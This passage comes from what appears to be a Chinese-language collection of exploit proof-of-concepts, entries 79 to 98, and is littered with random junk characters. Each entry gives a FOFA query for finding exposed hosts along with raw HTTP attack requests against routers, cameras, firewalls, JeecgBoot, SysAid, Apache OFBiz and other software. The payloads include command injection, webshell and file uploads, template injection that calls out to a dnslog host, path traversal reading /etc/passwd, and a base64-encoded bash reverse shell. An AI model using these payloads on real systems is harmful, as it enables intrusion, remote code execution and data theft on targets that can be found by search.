" M( [! o! f' G0 u* k) _% JContent-Disposition: form-data; name="target"0 b" | u x' K8 l. r F& s* l
0 r4 T# y" x' D; w/Applications/SkillDevelopAndEHS/: D) U# r! K) H* }" Q# c
------YsOxWxSvj1KyZow1PTsh98fdu6l--
7 A3 b/ F4 ?' o& T! z3 w7 N6 J& h2 m- s: l- n; X2 X! e' h1 A5 W- D
) ^5 x: R: _8 C0 G8 Z0 A
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
9 ^8 \' V j1 p% @, s# LHost: x.x.x.x
! r9 x% j' S& ~7 }4 P. e
! I& I$ l0 _1 t. p- ?- Z+ V
8 _+ B$ F) N W- t( B' e3 o79. BYTEVALUE 百为流控路由器远程命令执行, W; F6 }0 F! t
FOFA:BYTEVALUE 智能流控路由器
3 S- \& q& w& N1 } HGET /goform/webRead/open/?path=|id HTTP/1.1 b2 s1 a* m& _4 F
Host:IP# ]! t; J5 E/ C8 H% X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0& a# [' j! F& u' L, Z1 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) b8 _+ g0 a! V, b1 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 D# @" a; W3 |1 t6 R/ t' xAccept-Encoding: gzip, deflate
9 |( V5 q t) |( r5 bConnection: close o% m# o- W2 H5 M: q0 j# b% l
Upgrade-Insecure-Requests: 1, p1 a# R& o# u3 g0 x
* S! t. u+ s* B2 Q8 D, X0 g9 n, q' \2 y1 W! l
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
& N" N6 f" j2 T/ R! _( a3 b$ g$ cFOFA:app="速达软件-公司产品"
\) s% V) y1 q9 v, d9 U& Z# OPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
2 k) G: l" G( f9 `3 kHost: x.x.x.x
! K( _. w1 a; c$ M7 i+ Z9 |: {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- S; Z; a2 P+ O$ H) u" ^$ h. GContent-Length: 276 A, {. d6 |' G4 t8 S! K1 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 r, Q+ g: `9 u5 ^) Z/ P6 u# nAccept-Encoding: gzip, deflate: L! |* P J( p" A/ G& I6 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 n, p5 W! e/ `% g, GConnection: close
6 @0 K, ?, U# X3 D6 o# t% WContent-Type: application/octet-stream
3 I6 |4 \. ]) \0 K$ ]; w9 f J9 fUpgrade-Insecure-Requests: 1
. B2 f9 \8 A# o9 p2 @) j
$ T, o O, F- N& X& s: U<% out.print("oessqeonylzaf");%>% i. _; Q8 c7 h, [( F: q( Q
+ V3 Z5 S6 I& F& m( o' Z3 Q4 V
- [2 d$ B: l% }4 w2 B# p- MGET /xykqmfxpoas.jsp HTTP/1.1
) k. v9 M! a% g# y) [( R$ K) O) KHost: x.x.x.x
6 u3 {! `4 f) c q; P6 J- }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* i% ~7 J1 e7 m1 ^3 y9 r3 y6 \6 ]Connection: close
" R1 m9 c3 f" V% Z# _Accept-Encoding: gzip! M6 v6 y; V- O6 b4 D4 ~6 }
% q i6 a; z+ }- H- m
, ~. ^; e- A8 {81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
( J/ l1 H @9 r' X+ dFOFA:app="uniview-视频监控"
: p( a( J2 r! J- oGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1* W3 n$ A0 b( a$ U6 z, a4 a
Host: x.x.x.x6 }) `; R; Y7 O: ]/ K* P" e/ E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 e! s; Y& @% Y& t
Connection: close* g' q- m- g) y- I1 B# K- _
Accept-Encoding: gzip
8 \& k2 r* Z" V5 \$ z( y8 P/ _6 D! K5 o0 w) ^- v7 J
+ L7 ~# R# t% R% y
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行8 S/ d4 P6 Q- Z, z5 V3 B
FOFA:app="思福迪-LOGBASE"
8 ^( H. S! t! dPOST /bhost/test_qrcode_b HTTP/1.1
5 ]8 U1 y' M; V7 THost: BaseURL
5 N- H" H4 L) _3 @% w& PUser-Agent: Go-http-client/1.1
. |3 F! n' g1 j8 @1 R0 yContent-Length: 23" T, q( N' c6 ^' G& X2 ?
Accept-Encoding: gzip: E$ U% @( v$ M
Connection: close
2 f* ~+ L$ A0 X# H0 E( tContent-Type: application/x-www-form-urlencoded
) V& w* Z5 F7 L( aReferer: BaseURL- `4 K$ u" U v1 Q! J7 ?
+ j! i0 O; N) S$ [$ x m' wz1=1&z2="|id;"&z3=bhost
" ?1 V/ y# Q0 C5 f/ v& R& p( @* d' ]# Y8 V; u
% ^; u. M1 W$ s: q0 O83. JeecgBoot testConnection 远程命令执行
+ _) B, s) X, Q" r$ R7 e0 [ XFOFA:title=="JeecgBoot 企业级低代码平台"3 d4 q3 p. Q; i7 V- \
+ c/ `$ @- B$ h3 D. @* G: _
7 N1 }9 T0 P/ ^POST /jmreport/testConnection HTTP/1.1; l- t5 I8 I; y' ^( ?* T" K
Host: x.x.x.x
/ f, U! h) E8 | ~9 d, RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 b5 v7 a( X" v$ B4 }2 r6 pConnection: close
: F$ I- l9 P& u) WContent-Length: 8881
. c1 U2 D7 }; h' |Accept-Encoding: gzip" X6 l% G, e5 ]9 V
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO": z. J7 \8 r9 I% g3 i/ `
Content-Type: application/json9 i2 P2 g9 S% Q7 e* q. H( i$ h! I/ \ E1 W
" @' G# F0 l* T6 \; r' LPAYLOAD
& t+ H( K# p+ k) {, }5 U; H& z/ L, t7 ~1 A
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
1 g; {$ O. A! K# y2 YFOFA:title=="JeecgBoot 企业级低代码平台"
`' r+ _' x9 ~6 u: j3 M* N O2 x4 q% A0 U! t4 s# C# V/ O
6 k; j% j6 L; D5 y: n, U
5 b) z! w9 _" Y
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.13 |; j' f/ S- W- e
Host: 192.168.40.130:8080" e: d* b4 m7 y- @0 R
User-Agent: curl/7.88.1, i' h" }; [' c% ?( k
Content-Length: 1567 ?( C5 k D4 K, y
Accept: */*
3 P' b- K5 N; J2 zConnection: close
6 n4 W- f$ T5 HContent-Type: application/json
& @) Q* b) W9 w) `; e# b+ Y/ z( bAccept-Encoding: gzip5 R+ g( h, d$ i
( B$ r9 T j1 y% ^: Q) B{) I Y2 x$ k9 f3 U% J( ]6 _
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
. R. Z9 h) o. ]; w "type": "0"
' N( f& K i& v}0 R- f3 X( O. @+ S) i$ h% t
2 r, K# f( K* z! h E- v: l
) c# s& o; d) N0 [+ B, s
85. SysAid On-premise< 23.3.36远程代码执行
) D D: x$ ?: p% P8 ?' w; FCVE-2023-47246
; Y0 ]: ^, E; W( T+ fFOFA:body="sysaid-logo-dark-green.png" ( g) ]0 a: t4 }9 K0 Z. I
EXP数据包如下,注入哥斯拉马
3 ?% x6 g: v* KPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.16 `+ _. Y9 C3 I$ U% L% Q9 m
Host: x.x.x.x/ |, {8 B5 \4 E/ F A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! e! @& f+ m* |+ K z7 }# oContent-Type: application/octet-stream; r( `1 Q+ I1 e& ?2 E: m7 ?/ z
Accept-Encoding: gzip
: S! m( w8 Y5 z5 _* ^5 @. F8 e* \$ n1 u& m# P! X6 F
PAYLOAD
8 I9 @4 V% j" p
2 t5 o6 \5 C" {: o5 H7 E回显URL:http://x.x.x.x/userfiles/index.jsp- L* \) r+ P6 K5 h
1 M) q9 X% `3 s: x
86. 日本tosei自助洗衣机RCE
* g; W+ [ W6 K0 K2 x WFOFA:body="tosei_login_check.php"! ?# E7 U& @/ Q5 Z$ K! V1 x; q2 |
POST /cgi-bin/network_test.php HTTP/1.13 Z3 O- ]5 g! Y9 Z: [0 ?
Host: x.x.x.x0 X) f$ j* A0 k/ J7 U' l2 b( n
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
9 \+ V6 A8 L" J. i% I% j) ?Connection: close# f _- l5 c' C1 x
Content-Length: 44
8 @" D' P, Q& z3 j* X; L* FAccept: */*" q3 T5 d$ m: F: z1 M9 ?- A* a5 r
Accept-Encoding: gzip
6 v: t- ~7 Z/ gAccept-Language: en8 ^9 E* g- D% P3 n
Content-Type: application/x-www-form-urlencoded& g( E: d! K" [4 `
. b3 ?7 d. M4 o2 |9 s$ Bhost=%0acat${IFS}/etc/passwd%0a&command=ping
8 o+ s6 v+ o: n! F7 Q. e5 v" q* e9 A3 [( W
6 S% R9 K# H1 a( c87. 安恒明御安全网关aaa_local_web_preview文件上传& f9 N4 _& b* \ c
FOFA:title="明御安全网关"
% A( f* C# S5 L& n" WPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
& Y* p) i O) h" C% lHost: X.X.X.X
, k. l* |: S& {$ X% Y' |' SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. s7 a; v+ \$ W: s
Connection: close
1 M2 X: a8 y: \' Y. C& O$ RContent-Length: 198
6 R' \$ Z$ }; q2 y8 ]Accept-Encoding: gzip
+ U4 w$ u- o/ _+ ?$ eContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
. [% h6 [( p: C/ t' w+ u& [" Z9 z4 O* K) n5 _% k
--qqobiandqgawlxodfiisporjwravxtvd" } [, N& n! v. @; @' ]
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
: }3 L1 V1 I" c! zContent-Type: text/plain
+ Y" K j" V) l5 R$ J$ n* Z* [9 D2 z& j& X
2ZqGNnsjzzU2GBBPyd8AIA7QlDq. e; x* r0 D* X% F$ Y
--qqobiandqgawlxodfiisporjwravxtvd--
' r' W5 T& B- I e# z. m* F% h: s/ K. t5 f& }" W: I
& `9 A) `# r! `+ j! u- k/jfhatuwe.php
& P; G5 s; H5 E9 Z# K
6 m/ `7 Q' i7 O- m88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行0 q2 i8 O' ^! j! ?) B
FOFA:title="明御安全网关"
7 l* m3 b. R4 t4 _4 g8 kGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1" I4 ~' a1 w) T e0 B- `
Host: x.x.x.xx.x.x.x4 q1 H. `+ i+ L4 G, v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
l$ P( V' k. B( ?2 e/ |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 H) u9 t- `. [' v
Accept-Encoding: gzip, deflate
' K q# P+ U1 b- u% Z3 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* P3 Q( x+ s2 a% X9 ~
Connection: close" r4 k7 d9 B. X1 _5 W. Y( T
4 o0 w6 A( d3 O( H
: e4 o$ _ O. i/astdfkhl.php
" z( w8 l0 I9 u: K9 i. c n
[$ X4 B% s, k2 ]0 o; u89. 致远互联FE协作办公平台editflow_manager存在sql注入% m: t# y, L2 s- c5 w# b
FOFA:title="FE协作办公平台" || body="li_plugins_download"
2 V8 }/ P, w% j/ SPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
3 H0 _, Y& u3 A4 Y [4 m4 OHost: x.x.x.x, `; u6 T: V9 C4 s: O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ h; ~* B" E' `* D. vConnection: close5 k2 K5 F. R1 a7 a' {% k% }
Content-Length: 41, Y# I9 O/ H. I( K: x
Content-Type: application/x-www-form-urlencoded
" g" {$ ~& p0 }- ]) y" Q6 FAccept-Encoding: gzip
- S- P7 ^3 I! g" X, K3 r( q4 B
7 O2 a+ a# U6 {7 L3 f4 }option=2&GUID=-1'+union+select+111*222--+
" u y6 U. D: L, I+ L% ?
7 L' q4 [4 C6 |6 d
8 U# L) I! f: R" X90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行% U8 H8 `) {3 P8 T* B1 T5 L; f
FOFA:icon_hash="-1830859634"
. b5 F, |5 M$ x2 J4 `POST /php/ping.php HTTP/1.1% p+ ~$ ~8 A7 `9 w
Host: x.x.x.x
# |; ]9 U; Z" `2 ~/ W# KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
+ P3 U- k( |, v. x& e$ rContent-Length: 519 K2 e+ P; P6 f; G4 C
Accept: application/json, text/javascript, */*; q=0.01$ k) Q! m+ g( x% K$ `. s
Accept-Encoding: gzip, deflate
9 X% m6 Z: L; P5 h$ CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* r$ w" y8 u- c/ F/ P. VConnection: close( Q; u7 V. h% U0 c
Content-Type: application/x-www-form-urlencoded: g9 _( K% i9 G) c9 ~" h
X-Requested-With: XMLHttpRequest
1 }9 R" y2 H) s& O+ B3 P4 c0 {* x* d, H F% |( l7 Z* ]8 l
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig5 W+ l/ w) F- j) S" Q
2 A0 s( P7 n% F) R! R# c* k
' R1 B/ n1 Q; {2 q' _91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取% a! E8 P5 v7 K' C( i
FOFA:title="综合安防管理平台"' Y5 ^9 C+ b' T T! b6 h& s
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
3 p' _* Y' R- Q% g# F* MHost: your-ip" K- d& s) s7 V1 M m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.366 Q n. ^4 J$ W: C3 S( U
Accept-Encoding: gzip, deflate
( Y2 j# B" c' _+ |! [* ^) z7 r) AAccept: */*, N& C3 Z. ]/ J B
Connection: keep-alive3 i7 g, _: G- K8 q
+ S' O# t8 K: H i5 [2 P
% a3 u( h) u7 g+ f# k
, r% f: |" ]/ M; i# K! p92. 海康威视运行管理中心session命令执行
( M9 c' ^7 _) Z3 }4 u+ NFastjson命令执行
3 \) N5 u5 I7 ^# V% \hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"+ S/ b; h$ R3 I& X; k6 t
POST /center/api/session HTTP/1.1) p2 @" u5 x9 u; {( T% S% _
Host:
! A( ?6 w' _" k' S, b+ }5 D; ZAccept: application/json, text/plain, */*; x) v' R6 O& d
Accept-Encoding: gzip, deflate& p# i& g# H' B: p
X-Requested-With: XMLHttpRequest, l" @/ W, m# t2 R- t
Content-Type: application/json;charset=UTF-8
. }* ^, r5 T: ^4 \X-Language-Type: zh_CN
1 R. ?" O- y* r4 NTestcmd: echo test6 g/ I/ j: u9 [4 n& q! M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 O/ O5 u. r/ O# }" M% sAccept-Language: zh-CN,zh;q=0.94 ?. L- F T" ~! ^
Content-Length: 5778
7 `; Y0 a; E% P9 v# W4 W9 ?" u* z. ]0 j T
PAYLOAD' ^ ]# S4 ^6 }
7 y. n1 t2 ?: W2 ?' x
( S0 t- a/ G! H93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传8 V" _: |/ H5 m
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==". k& k& O+ L* Y' z/ z
POST /?g=app_av_import_save HTTP/1.1
! \8 `0 B) x4 iHost: x.x.x.x0 ^% q3 p8 B: j) ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
; c# ^: `1 `' F/ ?; S1 J) z; oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
z% C; ?; l9 e* A) S
4 I4 V3 J/ v; _4 K8 n3 V6 Z3 Z------WebKitFormBoundarykcbkgdfx$ v* I, ? f2 k" C
Content-Disposition: form-data; name="MAX_FILE_SIZE"0 f: m8 ?( ~5 p! I
9 B2 E1 ]6 ]' u
10000000! \# l9 m- M" a- C. n( Z+ h
------WebKitFormBoundarykcbkgdfx8 b+ n. x2 D' l7 Z* g
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
' J3 a: {. Q' `8 @' FContent-Type: text/plain" j9 ]: Y2 {( A& c: W5 N8 Q
" S/ h* Z4 {4 x1 y( S
wagletqrkwrddkthtulxsqrphulnknxa
}5 D b0 m _# A( c; c. C------WebKitFormBoundarykcbkgdfx
( \3 Y# M9 |4 S* c7 b% H; BContent-Disposition: form-data; name="submit_post"( z4 n( W0 N7 k8 g( I# D: c$ R
3 H7 j G% h5 p+ z- u7 Lobj_app_upfile4 H9 G! w; s6 {: q# J0 q. J; p4 D, v7 Q
------WebKitFormBoundarykcbkgdfx
5 {" Y8 b3 K; X; Q" F: @2 H: CContent-Disposition: form-data; name="__hash__"" c( O2 }& P5 S: a
+ Q& r' r% }2 u2 f: }0b9d6b1ab7479ab69d9f71b05e0e9445
0 x/ [7 L9 v5 X% A) R5 s% J------WebKitFormBoundarykcbkgdfx--, S" j9 U7 i( z. E
7 u( m' k H4 L' {
" {' l; i" ^" P3 ^. @
GET /attachements/xlskxknxa.txt HTTP/1.1" Q' S D/ N- a3 `
Host: xx.xx.xx.xx
1 H" J+ D1 c D( u* [! f2 F9 `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ q* S5 D, j: b) d
: s' R4 c3 G. X' c3 ]) P$ g" B% C6 J+ m& a
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
" K5 S7 M% m6 q! J7 ~FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
7 j/ o% V' _1 [+ u8 IPOST /?g=obj_area_import_save HTTP/1.1/ l$ e% ^0 J( y5 G
Host: x.x.x.x
% a' Z; R( _% N1 u+ X, e1 C; X4 FContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
9 ~8 H& y0 z ~" XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 E; Y, K+ E8 P c
$ z- Y; B; c: A! f5 z8 x; H+ W5 P/ |
------WebKitFormBoundarybqvzqvmt
# M2 W* L$ }" K/ m3 I. V6 t" fContent-Disposition: form-data; name="MAX_FILE_SIZE"
8 O! q0 D1 f1 z! M: l; ^
/ L0 u7 j5 X6 g& `% ?3 D3 d7 U0 }100000004 a. Z) O- N9 J' p/ g
------WebKitFormBoundarybqvzqvmt
, l7 |& C# m4 P: aContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"$ t; u! Q. e' m
Content-Type: text/plain
. n; [& b6 R: p$ `/ k6 O( ~5 |! |( l* Q, F3 ^
pxplitttsrjnyoafavcajwkvhxindhmu
7 ~7 I3 O4 p5 w6 S9 ^: `* [------WebKitFormBoundarybqvzqvmt' a7 S) @1 C9 J8 N$ g, L& Z
Content-Disposition: form-data; name="submit_post"
5 ~+ t( H7 Q5 u7 s) i* m* a. S' y# y! Y: z
obj_app_upfile
8 d8 @* M/ _# R1 O6 R' b------WebKitFormBoundarybqvzqvmt
0 e7 K' w% I; ^9 P" Y' uContent-Disposition: form-data; name="__hash__". o7 u) C1 }1 W+ T, @5 i9 N
' J0 d0 c/ z( K3 l- P
0b9d6b1ab7479ab69d9f71b05e0e9445
1 p/ L3 ^3 j6 t1 d& S" ?8 _1 N- L0 N0 N+ o------WebKitFormBoundarybqvzqvmt--
! U- W: Y. l2 B5 ~" g+ c4 P( n7 v4 e( y; o. I2 `8 {
0 G; l# k) k1 \4 r# @
; Q3 J$ m" J8 T; W* cGET /attachements/xlskxknxa.txt HTTP/1.1
7 W) f5 j3 q3 j) NHost: xx.xx.xx.xx- v" U; y# L% @
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.369 S: C- n0 M3 y3 n6 }* ]% o6 K2 [1 x
) c" `8 k9 h9 W* B! F# i
3 Z/ \- Z6 F2 K
* T8 c$ h- R/ y x& w0 |95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
' P ^# M% Q1 t! ~! jCVE-2023-49070# I0 F- H0 `, M0 o8 u
FOFA:app="Apache_OFBiz"
' H, K5 E7 h% U0 VPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
( F2 F8 Q0 [- CHost: x.x.x.x( M4 z, p- T3 f Q( s" T+ ]5 p' S
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 I# o& Q9 G, f2 |6 Q' J
Connection: close; R* J, Y% y7 I6 [: @
Content-Length: 889
) l# [ x0 r0 [# ]" rContent-Type: application/xml2 D* D1 q& r8 u
Accept-Encoding: gzip0 L/ h8 K- O$ O* Q1 n- `
! ^1 |) p) t* i! b; ~7 E( H" z5 |<?xml version="1.0"?>
$ {) d- A' z) E3 ~<methodCall>
5 W# @# l3 f& a1 i3 o$ _ <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>- l4 R% _; I) _$ N7 \, N+ z
<params>$ h& U) l' K5 f4 G! w8 _( m
<param>
( q- _( o* ?! q& C5 l! M! T <value>
( u' E; z: S6 P" ] <struct>
4 ~, ~. L! D7 Y" t+ w1 k' K <member>5 N2 d$ z8 F8 F$ b' E. [8 v
<name>test</name>
; M, m4 |2 ~) T <value>$ E' \. e0 X8 \
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
/ O! T% {1 J/ w( U </value>
9 w0 {% K$ N% \+ n6 \ </member>
" F" y& a) L i# g, S </struct>: F& L" A, Q3 p% {
</value>$ ?) G) A" |+ V3 j: T1 ?/ x
</param>- p: d. p* o& H2 L! W( q
</params>4 P! i# ]2 y# `7 Q0 ^+ X- U
</methodCall>
, o w' c0 T) r$ Z% O ~# x
, @; E) c: H% V Q9 M7 \8 n4 V \* k* @, C2 A( _% u1 V1 b: y- K$ e- {2 D- ~
用ysoserial生成payload* _+ D5 e3 w% t) j1 u' C
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
7 B9 v5 i. N+ T2 l7 Y6 `- g2 x: J6 O+ }* ~
, u- [; y/ u. d$ D8 i# a将生成的payload替换到上面的POC Y6 X) r* N' V. C! k2 V0 s/ m
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
8 Z! K9 [% H& p" BHost: 192.168.40.130:8443; Y/ u. j' `% b. O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36% g8 V( w1 j( y$ I2 W
Connection: close, K" h4 y6 i6 f( C6 c2 h* _
Content-Length: 889
2 p* }$ @ g3 pContent-Type: application/xml7 ~( p/ K. s2 Z8 C4 [
Accept-Encoding: gzip
' s- t7 ~3 v7 Z. l- `3 K: }) X7 ?: Q1 u- d2 p4 n8 e
PAYLOAD
9 F8 U0 ~6 @) E/ g* ]& T, T5 U F* b* }8 `& d- i
96. Apache OFBiz 18.12.11 groovy 远程代码执行$ u8 ` B! G; k" ~
FOFA:app="Apache_OFBiz"2 S% n1 u8 l" z& H$ n2 v- z
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.12 y: D# w; l `* _; F
Host: localhost:8443; ~/ K k. B6 n! Z* R2 ?+ r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0( p* f5 w- N# m& S4 k% t
Accept: */*7 Q1 R. J6 [* f9 r4 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ O; S8 m! v$ v( Q; p2 IContent-Type: application/x-www-form-urlencoded" G/ p$ v* R# ]9 {1 e6 I# [; o
Content-Length: 55! j& D% n2 l6 {4 D9 {
& [4 U( ?& c/ t8 H
groovyProgram=throw+new+Exception('id'.execute().text);; H* f* A) z8 n: j! M+ K S0 L8 W
/ q4 s8 _1 Y) y
* K0 t. A/ R W/ B% [反弹shell, O2 p* V1 B( @9 R# Y
在kali上启动一个监听
+ y; u, s# r7 m% J7 w2 r+ [nc -lvp 7777
; y( Z% B) M; N8 B( v( L" [; T) z" E8 x3 J7 U0 b) |
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
: ^: C$ n5 p6 b& z8 K0 nHost: 192.168.40.130:8443/ U' @4 n" b" I. b# }* ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
" ~, Z; v0 v: L8 h- F" i, WAccept: */*
' E# `% t; M0 t, @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: Q: I& L" W+ d( t5 ^3 yContent-Type: application/x-www-form-urlencoded7 i; A) V' R' b) r
Content-Length: 710 s& u/ H- y) J4 K4 D$ n
A6 L# U& w$ R( n$ S" Z( U" |2 X% G
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute(); u, f/ y0 |! r* Q
7 W W( {5 f& k, e/ `- _. Y97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行+ W! k) A, @- G. _
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
2 p( O! `0 {5 T; W( H' E7 @$ v; fGET /passport/login/ HTTP/1.1
, j. Z: @8 f" X. h$ L9 {7 {7 AHost: 192.168.40.130:8085
& @8 J# z- y3 ?+ N% s" lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" A B7 p& u' {" u# q
Accept-Encoding: gzip
# H0 j; Y$ c+ [9 rConnection: close, \, ~/ f1 g8 }* U& W- k1 {5 K
Cookie: rememberMe=PAYLOAD+ ]6 n$ j: n G& O
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
$ y" V7 F& A8 d
: P2 P: V) |& i% p
. n! @! Q$ h7 ~8 K2 y1 F0 t% E. } ?! m98. SpiderFlow爬虫平台远程命令执行
4 z0 K& ^) u- D0 a8 N0 A( m- WCVE-2024-0195+ n1 \* B! v0 Y2 p
FOFA:app="SpiderFlow"0 \' I( x4 J8 z
POST /function/save HTTP/1.1
$ |) Q- J! q) u% g6 D( pHost: 192.168.40.130:8088
1 _* a2 _1 X# K& A8 e' F4 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! ^5 g2 K7 ]& _# lConnection: close
2 X3 @' w( O/ w% Q: kContent-Length: 121* _# @# a5 W+ [
Accept: */*
8 d5 C( u* v! _6 \Accept-Encoding: gzip, deflate
. V8 N1 s4 |: M% {( q( b/ v1 m: jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
